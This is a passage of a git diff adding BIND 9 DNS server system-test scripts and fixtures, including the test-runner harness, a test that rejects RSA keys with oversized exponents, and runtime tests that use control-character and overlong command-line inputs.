+ transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + dnssec-validation yes; + max-rsa-exponent-size 35; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/rsabigexponent/prereq.sh b/bin/tests/system/rsabigexponent/prereq.sh new file mode 100644 index 0000000..c18f6c8 --- /dev/null +++ b/bin/tests/system/rsabigexponent/prereq.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $BIGKEY > /dev/null 2>&1 +then + rm -f Kexample.* +else + echo_i "This test requires OpenSSL cryptography provider" >&2 + echo_i "configure with --with-openssl, and make sure you disable --with-pkcs11 and --enable-native-pkcs11" >&2 + exit 255 +fi diff --git a/bin/tests/system/rsabigexponent/setup.sh b/bin/tests/system/rsabigexponent/setup.sh new file mode 100644 index 0000000..53f56b9 --- /dev/null +++ b/bin/tests/system/rsabigexponent/setup.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf + +cd ns1 && $SHELL -e sign.sh diff --git a/bin/tests/system/rsabigexponent/tests.sh b/bin/tests/system/rsabigexponent/tests.sh new file mode 100644 index 0000000..c3c7a3f --- /dev/null +++ b/bin/tests/system/rsabigexponent/tests.sh @@ -0,0 +1,57 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd +dnssec -p ${PORT}" + +for f in conf/good*.conf +do + echo_i "checking '$f'" + ret=0 + $CHECKCONF $f > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for f in conf/bad*.conf +do + echo_i "checking '$f'" + ret=0 + $CHECKCONF $f > /dev/null && ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +echo_i "checking that RSA big exponent keys can't be loaded" +ret=0 +grep "out of range" ns2/signer.err > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that RSA big exponent signature can't validate" +ret=0 +$DIG $DIGOPTS a.example @10.53.0.2 > dig.out.ns2 || ret=1 +$DIG $DIGOPTS a.example @10.53.0.3 > dig.out.ns3 || ret=1 +grep "status: NOERROR" dig.out.ns2 > /dev/null || ret=1 +grep "status: SERVFAIL" dig.out.ns3 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/run.gdb b/bin/tests/system/run.gdb new file mode 100644 index 0000000..60981e1 --- /dev/null +++ b/bin/tests/system/run.gdb @@ -0,0 +1 @@ +thread apply all bt full diff --git a/bin/tests/system/run.sh b/bin/tests/system/run.sh new file mode 100755 index 0000000..2330d7c --- /dev/null +++ b/bin/tests/system/run.sh @@ -0,0 +1,346 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Run a system test. +# + +SYSTEMTESTTOP="$(cd -P -- "$(dirname -- "$0")" && pwd -P)" +. $SYSTEMTESTTOP/conf.sh + +if [ "$CI_SERVER" != "yes" ] && [ "$(id -u)" -eq "0" ] && ! ${NAMED} -V | grep -q -F -- "enable-developer"; then + echofail "Refusing to run test as root. Build with --enable-developer to override." >&2 + exit 1 +fi + +export SYSTEMTESTTOP + +date_with_args() ( + date "+%Y-%m-%dT%T%z" +) + +stopservers=true +baseport=5300 + +if [ ${SYSTEMTEST_NO_CLEAN:-0} -eq 1 ]; then + clean=false +else + clean=true +fi + +restart=false +while getopts "knp:r-:t" flag; do + case "$flag" in + -) case "${OPTARG}" in + keep) stopservers=false ;; + noclean) clean=false ;; + esac + ;; + k) stopservers=false ;; + n) clean=false ;; + p) baseport=$OPTARG ;; + t) restart=true ;; + esac +done +shift `expr $OPTIND - 1` + +if [ $# -eq 0 ]; then + echofail "Usage: $0 [-k] [-n] [-p <PORT>] test-directory [test-options]" >&2; + exit 1 +fi + +systest=${1%%/} +shift + +if [ ! -d $systest ]; then + echofail "$0: $systest: no such test" >&2 + exit 1 +fi + +# Define the number of ports allocated for each test, and the lowest and +# highest valid values for the "-p" option. +# +# The lowest valid value is one more than the highest privileged port number +# (1024). +# +# The highest valid value is calculated by noting that the value passed on the +# command line is the lowest port number in a block of "numports" consecutive +# ports and that the highest valid port number is 65,535. +numport=100 +minvalid=`expr 1024 + 1` +maxvalid=`expr 65535 - $numport + 1` + +test "$baseport" -eq "$baseport" > /dev/null 2>&1 +if [ $? -ne 0 ]; then + echofail "$0: $systest: must specify a numeric value for the port" >&2 + exit 1 +elif [ $baseport -lt $minvalid -o $baseport -gt $maxvalid ]; then + echofail "$0: $systest: the specified port must be in the range $minvalid to $maxvalid" >&2 + exit 1 +fi + +# Name the first 10 ports in the set (it is assumed that each test has access +# to ten or more ports): the query port, the control port and eight extra +# ports. Since the lowest numbered port (specified in the command line) +# will usually be a multiple of 10, the names are chosen so that if this is +# true, the last digit of EXTRAPORTn is "n". +PORT=$baseport +EXTRAPORT1=`expr $baseport + 1` +EXTRAPORT2=`expr $baseport + 2` +EXTRAPORT3=`expr $baseport + 3` +EXTRAPORT4=`expr $baseport + 4` +EXTRAPORT5=`expr $baseport + 5` +EXTRAPORT6=`expr $baseport + 6` +EXTRAPORT7=`expr $baseport + 7` +EXTRAPORT8=`expr $baseport + 8` +CONTROLPORT=`expr $baseport + 9` + +LOWPORT=$baseport +HIGHPORT=`expr $baseport + $numport - 1` + +export PORT +export EXTRAPORT1 +export EXTRAPORT2 +export EXTRAPORT3 +export EXTRAPORT4 +export EXTRAPORT5 +export EXTRAPORT6 +export EXTRAPORT7 +export EXTRAPORT8 +export CONTROLPORT + +export LOWPORT +export HIGHPORT + +# Start all servers used by the system test. Ensure all log files written +# during a system test (tests.sh + potentially multiple *.py scripts) are +# retained for each run by calling start.pl with the --restart command-line +# option for all invocations except the first one. +start_servers() { + echoinfo "I:$systest:starting servers" + if $restart || [ "$run" -gt 0 ]; then + restart_opt="--restart" + fi + if ! $PERL start.pl ${restart_opt} --port "$PORT" "$systest"; then + echoinfo "I:$systest:starting servers failed" + return 1 + fi +} + +stop_servers() { + if $stopservers; then + echoinfo "I:$systest:stopping servers" + if ! $PERL stop.pl "$systest"; then + echoinfo "I:$systest:stopping servers failed" + return 1 + fi + fi +} + +echostart "S:$systest:$(date_with_args)" +echoinfo "T:$systest:1:A" +echoinfo "A:$systest:System test $systest" +echoinfo "I:$systest:PORTRANGE:${LOWPORT} - ${HIGHPORT}" + +if [ x${PERL:+set} = x ] +then + echowarn "I:$systest:Perl not available. Skipping test." + echowarn "R:$systest:SKIPPED" + echoend "E:$systest:$(date_with_args)" + exit 0; +fi + +$PERL testsock.pl -p $PORT || { + echowarn "I:$systest:Network interface aliases not set up. Skipping test." + echowarn "R:$systest:SKIPPED" + echoend "E:$systest:$(date_with_args)" + exit 0; +} + +# Check for test-specific prerequisites. +test ! -f $systest/prereq.sh || ( cd $systest && $SHELL prereq.sh "$@" ) +result=$? + +if [ $result -eq 0 ]; then + : prereqs ok +else + echowarn "I:$systest:Prerequisites missing, skipping test." + echowarn "R:$systest:SKIPPED"; + echoend "E:$systest:$(date_with_args)" + exit 0 +fi + +# Check for PKCS#11 support +if + test ! -f $systest/usepkcs11 || $SHELL cleanpkcs11.sh +then + : pkcs11 ok +else + echowarn "I:$systest:Need PKCS#11, skipping test." + echowarn "R:$systest:PKCS11ONLY" + echoend "E:$systest:$(date_with_args)" + exit 0 +fi + +# Clean up files left from any potential previous runs except when +# started with the --restart option. +if ! $restart; then + if test -f "$systest/clean.sh"; then + if ! ( cd "${systest}" && $SHELL clean.sh "$@" ); then + echowarn "I:$systest:clean.sh script failed" + echofail "R:$systest:FAIL" + echoend "E:$systest:$(date_with_args)" + exit 1 + fi + fi +fi + +# Set up any dynamically generated test data +if test -f $systest/setup.sh +then + if ! ( cd "${systest}" && $SHELL setup.sh "$@" ); then + echowarn "I:$systest:setup.sh script failed" + echofail "R:$systest:FAIL" + echoend "E:$systest:$(date_with_args)" + exit 1 + fi +fi + +status=0 +run=0 +# Run the tests +if [ -r "$systest/tests.sh" ]; then + if start_servers; then + ( cd "$systest" && $SHELL tests.sh "$@" ) + status=$? + run=$((run+1)) + stop_servers || status=1 + else + status=1 + fi +fi + +if [ $status -eq 0 ]; then + if [ -n "$PYTEST" ]; then + for test in $(cd "${systest}" && find . -name "tests*.py"); do + rm -f "$systest/$test.status" + if start_servers; then + run=$((run+1)) + test_status=0 + (cd "$systest" && "$PYTEST" --confcutdir ../ -rsxX -v "$test" "$@" || echo "$?" > "$test.status") | SYSTESTDIR="$systest" cat_d + if [ -f "$systest/$test.status" ]; then + if [ "$(cat "$systest/$test.status")" != "5" ]; then + test_status=$(cat "$systest/$test.status") + fi + fi + status=$((status+test_status)) + stop_servers || status=1 + else + status=1 + fi + if [ $status -ne 0 ]; then + break + fi + done + rm -f "$systest/$test.status" + else + echoinfo "I:$systest:pytest not installed, skipping python tests" + fi +fi + +if [ "$run" -eq "0" ]; then + echoinfo "I:$systest:No tests were found and run" + status=255 +fi + + +if $stopservers +then + : +else + exit $status +fi + +get_core_dumps() { + find "$systest/" \( -name 'core' -or -name 'core.*' -or -name '*.core' \) ! -name '*.gz' ! -name '*.txt' | sort +} + +core_dumps=$(get_core_dumps | tr '\n' ' ') +if [ -n "$core_dumps" ]; then + echoinfo "I:$systest:Core dump(s) found: $core_dumps" + get_core_dumps | while read -r coredump; do + SYSTESTDIR="$systest" + echoinfo "D:$systest:backtrace from $coredump:" + echoinfo "D:$systest:--------------------------------------------------------------------------------" + binary=$(gdb --batch --core="$coredump" 2>/dev/null | sed -ne "s|Core was generated by \`\([^' ]*\)[' ].*|\1|p") + if [ ! -f "${binary}" ]; then + binary=$(find "${TOP}" -path "*/.libs/${binary}" -type f) + fi + "${TOP}/libtool" --mode=execute gdb \ + -batch \ + -ex bt \ + -core="$coredump" \ + -- \ + "$binary" 2>/dev/null | sed -n '/^Core was generated by/,$p' | cat_d + echoinfo "D:$systest:--------------------------------------------------------------------------------" + coredump_backtrace="${coredump}-backtrace.txt" + echoinfo "D:$systest:full backtrace from $coredump saved in $coredump_backtrace" + "${TOP}/libtool" --mode=execute gdb \ + -batch \ + -command="${TOP_SRCDIR}/bin/tests/system/run.gdb" \ + -core="$coredump" \ + -- \ + "$binary" > "$coredump_backtrace" 2>&1 + echoinfo "D:$systest:core dump $coredump archived as $coredump.gz" + gzip -1 "${coredump}" + done + status=$((status+1)) +fi + +assertion_failures=$(find "$systest/" -name named.run -exec grep "assertion failure" {} + | wc -l) +if [ "$assertion_failures" -ne 0 ]; then + SYSTESTDIR="$systest" + echoinfo "I:$systest:$assertion_failures assertion failure(s) found" + status=$((status+1)) +fi + +tsan_failures=$(find "$systest/" -name 'tsan.*' | wc -l) +if [ "$tsan_failures" -ne 0 ]; then + echoinfo "I:$systest:$tsan_failures sanitizer report(s) found" + find "$systest/" -name 'tsan.*' -exec grep "SUMMARY: " {} + | sort -u | cat_d + status=$((status+1)) +fi + +if [ "$status" -ne 0 ]; then + echofail "R:$systest:FAIL" +else + echopass "R:$systest:PASS" + if $clean && ! $restart; then + ( cd $systest && $SHELL clean.sh "$@" ) + if test -d ../../../.git; then + git status -su --ignored "${systest}/" 2>/dev/null | \ + sed -n -e 's|^?? \(.*\)|I:'${systest}':file \1 not removed|p' \ + -e 's|^!! \(.*/named.run\)$|I:'${systest}':file \1 not removed|p' \ + -e 's|^!! \(.*/named.memstats\)$|I:'${systest}':file \1 not removed|p' + fi + fi +fi + +NAMED_RUN_LINES_THRESHOLD=200000 +find "${systest}" -type f -name "named.run" -exec wc -l {} \; | awk "\$1 > ${NAMED_RUN_LINES_THRESHOLD} { print \$2 }" | sort | while read -r LOG_FILE; do + echowarn "I:${systest}:${LOG_FILE} contains more than ${NAMED_RUN_LINES_THRESHOLD} lines, consider tweaking the test to limit disk I/O" +done + +echoend "E:$systest:$(date_with_args)" + +exit $status diff --git a/bin/tests/system/runall.sh b/bin/tests/system/runall.sh new file mode 100755 index 0000000..0391633 --- /dev/null +++ b/bin/tests/system/runall.sh @@ -0,0 +1,107 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Run all the system tests. +# +# Usage: +# runall.sh [-c] [-n] [numprocesses] +# +# -c Force colored output. +# +# -n Noclean. Keep all output files produced by all tests. These +# can later be removed by running "cleanall.sh". +# +# numprocess Number of concurrent processes to use when running the tests. +# The default is one, which causes the tests to run sequentially. +# (This is ignored when running on Windows as the tests are always +# run sequentially on that platform.) + +SYSTEMTESTTOP=. +. $SYSTEMTESTTOP/conf.sh + +usage="Usage: ./runall.sh [-c] [-n] [numprocesses]" + +# Preserve values of environment variables which are already set. + +SYSTEMTEST_FORCE_COLOR=${SYSTEMTEST_FORCE_COLOR:-0} +SYSTEMTEST_NO_CLEAN=${SYSTEMTEST_NO_CLEAN:-0} + +# Handle command line switches if present. + +while getopts "cn" flag; do + case "$flag" in + c) SYSTEMTEST_FORCE_COLOR=1 ;; + n) SYSTEMTEST_NO_CLEAN=1 ;; + esac +done +export NOCLEAN +shift `expr $OPTIND - 1` + +# Obtain number of processes to use. + +if [ $# -eq 0 ]; then + numproc=1 +elif [ $# -eq 1 ]; then + test "$1" -eq "$1" > /dev/null 2>&1 + if [ $? -ne 0 ]; then + # Value passed is not numeric + echo "$usage" >&2 + exit 1 + fi + numproc=$1 +else + echo "$usage" >&2 + exit 1 +fi + +# Run the tests. + +export SYSTEMTEST_FORCE_COLOR +export SYSTEMTEST_NO_CLEAN + +status=0 + +if [ "$NOPARALLEL" = "" ]; then + if [ "$CYGWIN" = "" ]; then + # Running on Unix, use "make" to run tests in parallel. + make -j $numproc check + status=$? + else + # Running on Windows: Cygwin "make" is available, but isn't being + # used for the build. So we create a special makefile for the purpose + # of parallel execution of system tests, and use that. + $SHELL parallel.sh > parallel.mk + make -f parallel.mk -j $numproc check + $SHELL ./runsequential.sh + $SHELL ./testsummary.sh || status=1 + fi +else + # the NOPARALLEL environment variable indicates that tests must be + # run sequentially. + $PERL testsock.pl || { + cat <<-EOF + I:NOTE: System tests were skipped because they require the + I: test IP addresses 10.53.0.* to be configured as alias + I: addresses on the loopback interface. Please run + I: "bin/tests/system/ifconfig.sh up" as root to configure them. + EOF + exit 1 + } + { + for testdir in $SUBDIRS; do + $SHELL run.sh $testdir || status=1 + done + } 2>&1 | tee "systests.output" +fi + +exit $status diff --git a/bin/tests/system/runsequential.sh b/bin/tests/system/runsequential.sh new file mode 100755 index 0000000..41f9c83 --- /dev/null +++ b/bin/tests/system/runsequential.sh @@ -0,0 +1,27 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Run system tests that must be run sequentially +# +# Note: Use "make check" (or runall.sh) to run all the system tests. This +# script will just run those tests that require that each of their nameservers +# is the only one running on an IP address. +# + +SYSTEMTESTTOP=. +. $SYSTEMTESTTOP/conf.sh + +for d in $SEQUENTIALDIRS +do + $SHELL run.sh "${@}" $d 2>&1 | tee test.output.$d +done diff --git a/bin/tests/system/runtime/README b/bin/tests/system/runtime/README new file mode 100644 index 0000000..9272f12 --- /dev/null +++ b/bin/tests/system/runtime/README @@ -0,0 +1,13 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +Tests of runtime checks, e.g., that named prevents duplicate processes +from running. diff --git a/bin/tests/system/runtime/clean.sh b/bin/tests/system/runtime/clean.sh new file mode 100644 index 0000000..39fdc0c --- /dev/null +++ b/bin/tests/system/runtime/clean.sh @@ -0,0 +1,25 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +[ -d ns2/nope ] && chmod 755 ns2/nope + +rm -f *.pid +rm -f */named*.run +rm -f */named.memstats +rm -f kill*.out +rm -f ns*/managed-keys.bind* +rm -f ns*/named.lock ns*/named*.pid ns*/other.lock +rm -f ns2/named.conf ns2/named-alt*.conf +rm -f rndc.out* +rm -rf ns2/nope +rm -rf ns2/tmp.* diff --git a/bin/tests/system/runtime/ctrl-chars b/bin/tests/system/runtime/ctrl-chars new file mode 100644 index 0000000..4ce1650 --- /dev/null +++ b/bin/tests/system/runtime/ctrl-chars @@ -0,0 +1 @@ +
\ No newline at end of file diff --git a/bin/tests/system/runtime/long-cmd-line b/bin/tests/system/runtime/long-cmd-line new file mode 100644 index 0000000..e691a71 --- /dev/null +++ b/bin/tests/system/runtime/long-cmd-line @@ -0,0 +1 @@ +-m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage -m usage diff --git a/bin/tests/system/runtime/ns2/named-alt1.conf.in b/bin/tests/system/runtime/ns2/named-alt1.conf.in new file mode 100644 index 0000000..4efb3d7 --- /dev/null +++ b/bin/tests/system/runtime/ns2/named-alt1.conf.in @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + notify yes; + dnssec-validation no; +}; diff --git a/bin/tests/system/runtime/ns2/named-alt2.conf.in b/bin/tests/system/runtime/ns2/named-alt2.conf.in new file mode 100644 index 0000000..ab374f8 --- /dev/null +++ b/bin/tests/system/runtime/ns2/named-alt2.conf.in @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; 10.53.0.3; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + notify yes; + dnssec-validation no; +}; diff --git a/bin/tests/system/runtime/ns2/named-alt3.conf.in b/bin/tests/system/runtime/ns2/named-alt3.conf.in new file mode 100644 index 0000000..0f351aa --- /dev/null +++ b/bin/tests/system/runtime/ns2/named-alt3.conf.in @@ -0,0 +1,26 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source 